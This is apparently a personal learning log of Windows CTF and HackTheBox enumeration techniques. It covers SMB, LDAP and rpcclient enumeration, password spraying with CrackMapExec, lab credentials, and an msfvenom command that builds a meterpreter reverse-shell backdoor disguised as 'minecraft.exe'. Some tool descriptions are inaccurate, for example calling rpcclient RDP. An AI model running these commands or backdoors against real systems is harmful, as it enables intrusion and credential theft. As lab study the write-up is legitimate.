How
I don’t like courses; if I don’t look for the information myself, it’s not effective.
So I’m going to look for beginner’s articles, find the tools and read what they do on GitHub.
While I read, I will write it here, and at the end of the day I will do a CTF on Windows.
Let’s begin:
How to search on Google
It’s not necessary, but I would like to share how I do it.
It’s not amazing, but I saw too many people who write the full sentence on Google with uppercase, punctuation and politeness formulas…
How I do:
- Few words (subject, verb):
- windows ctf writeup
- windows ctf boot to root
- boot to root windows
- writeup hack the box windows
- We don’t care about the order of the words
- Middle click on every link to open them in a new tab
- Scroll very fast without reading; on the first one, if I feel like it’s useless, close it (ctrl+w)
- You can also search for the word `windows`.
And here are the interesting links:
- https://cybergladius.com/htb-walkthrough-support/
- https://www.hackingarticles.in/writer-hackthebox-walkthrough/
- https://systemweakness.com/flatline-windows-hacking-tryhackme-ctf-ac57b03a80a1
- https://www.youtube.com/watch?v=iIveZ-raTTQ&list=PLidcsTyj9JXL4Jv6u9qi8TcUgsNoKKHNn
- https://haax.fr/fr/walkthroughs/hackthebox/remote/
That’s enough, let’s start working.
Find subdomains
dig @$ip +short support.htb any
If you find something, you have to write it in /etc/hosts.
Samba
smbclient -N -L \\\\$IP
-L to list the shares
-N to suppress the password prompt
It will only work if guest login is enabled.
Then:
smbclient -N \\\\$ip\\share
Now you can use `?` to display the commands; I mainly use `get`, `ls` and `dir`.
To download all the files in a directory (sometimes `mask` is not needed):
SMB:> mask ""
SMB:> recurse ON
SMB:> prompt OFF
SMB:> mget *
Mount it:
mkdir /mnt/ctf
mount -t cifs //10.10.10.192/profiles$ /mnt/ctf
Execute an exe file on Linux
With nono or wine64. I don’t know nono.
I don’t care about this step, let’s continue.
LDAP Enumeration
He uses ldapsearch, but he only gives one example, so I’m searching somewhere else.
https://devconnected.com/how-to-search-ldap-using-ldapsearch-examples/
I will install it:
sudo pacman -S openldap
https://wiki.archlinux.org/title/OpenLDAP
https://access.redhat.com/documentation/en-us/red_hat_directory_server/11/html/administration_guide/examples-of-common-ldapsearches
https://0xdf.gitlab.io/tags#ldapsearch
Examples
ldapsearch -H ldap://blackfield.local:389 -x -b DC=blackfield,DC=LOCAL
ldapsearch -h support.htb -x -s base namingcontexts
ldapsearch -h support.htb -x -b "DC=support,DC=htb"
ldapsearch -h support.htb -D 'ldap@support.htb' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b "DC=support,DC=htb"| less
# Without auth
ldapsearch -h 10.10.11.168 -x -s base namingcontexts
# With auth
ldapsearch -h 10.10.11.129 -D 'hope.sharp@search.htb' -w "IsolationIsKey?" -b "DC=search,DC=htb"
# I don't understand this one
ldapsearch -h 127.0.0.1 -x -b 'dc=htb' -D 'cn=binduser,ou=users,dc=pikaboo,dc=htb' -w 'J~42%W?PFHl]g'
crackmapexec
CrackMapExec shows the full OS information:
oxdf@parrot$ crackmapexec smb 10.10.10.248
SMB 10.10.10.248 445 DC [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:intelligence.htb) (signing:True) (SMBv1:False)
So, if dig is not working you can use this; I think you should use both.
You can also see if SMBv1 is enabled.
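To make use of that line, here is an added parser (not from the original post or from CrackMapExec itself) that pulls the host name, domain, signing and SMBv1 fields out of CrackMapExec’s SMB output and reports the two settings worth noting: signing not required and SMBv1 enabled. The sample lines are constructed; the first mirrors the line above, the second is an invented weaker host.

```python
import re

# Constructed sample output in the format crackmapexec prints for SMB targets.
# The first line mirrors the one in the text; the second is made up to show
# a host with weaker settings. These are not real hosts.
SAMPLE_OUTPUT = """\
SMB 10.10.10.248 445 DC [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:intelligence.htb) (signing:True) (SMBv1:False)
SMB         10.0.0.5        445    FILESRV01        [*] Windows 6.1 Build 7601 x64 (name:FILESRV01) (domain:corp.local) (signing:False) (SMBv1:True)
"""

# One regex for the whole line; column padding varies, so \s+ is used between fields.
LINE_RE = re.compile(
    r"^SMB\s+(?P<ip>\S+)\s+(?P<port>\d+)\s+(?P<host>\S+)\s+\[\*\]\s+(?P<os>.*?)\s*"
    r"\(name:(?P<name>[^)]*)\)\s+\(domain:(?P<domain>[^)]*)\)\s+"
    r"\(signing:(?P<signing>True|False)\)\s+\(SMBv1:(?P<smbv1>True|False)\)\s*$"
)


def parse_cme_smb(output):
    """Return one dict per SMB host line; lines that do not match are skipped."""
    hosts = []
    for line in output.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        host = m.groupdict()
        host["port"] = int(host["port"])
        host["signing"] = host["signing"] == "True"
        host["smbv1"] = host["smbv1"] == "True"
        hosts.append(host)
    return hosts


def smb_findings(host):
    """List the settings a defender would want fixed on this host."""
    findings = []
    if not host["signing"]:
        findings.append("SMB signing not required (NTLM relay risk)")
    if host["smbv1"]:
        findings.append("SMBv1 enabled (legacy protocol, should be disabled)")
    return findings


if __name__ == "__main__":
    for h in parse_cme_smb(SAMPLE_OUTPUT):
        print(h["name"], h["domain"], h["os"], smb_findings(h) or "ok")
```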
smbmap
I don’t see the difference with smbclient.
Backdoor
https://www.youtube.com/watch?v=Nt0CE3Km8Nw
Target = 192.168.5.115
me = 192.168.5.128
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$me LPORT=$myport -f exe > minecraft.exe
So, if you can upload something, you can upload a backdoor.
rpcclient
It’s the RDP.
Connect
rpcclient -U '' -N $IP
Enumerate users
enumdomusers
Clean the output:
cat users.txt | awk -F\[ '{print $2}' | awk -F \] '{print $1}' > valid_users.txt
Then in the CTF he uses ldapsearch to find the password and decode it.
crackmapexec
Then he uses the list of users to brute force SMB with the valid password and the tool crackmapexec.
I need it.
yay -S crackmapexec
Wow, only for one tool…
Ok… I will install it later.
Later:
yay -S crackmapexec --overwrite '*'
Then he brute forces.
https://cheatsheet.haax.fr/windows-systems/exploitation/crackmapexec/
SharpHound
It’s used to enumerate for privesc.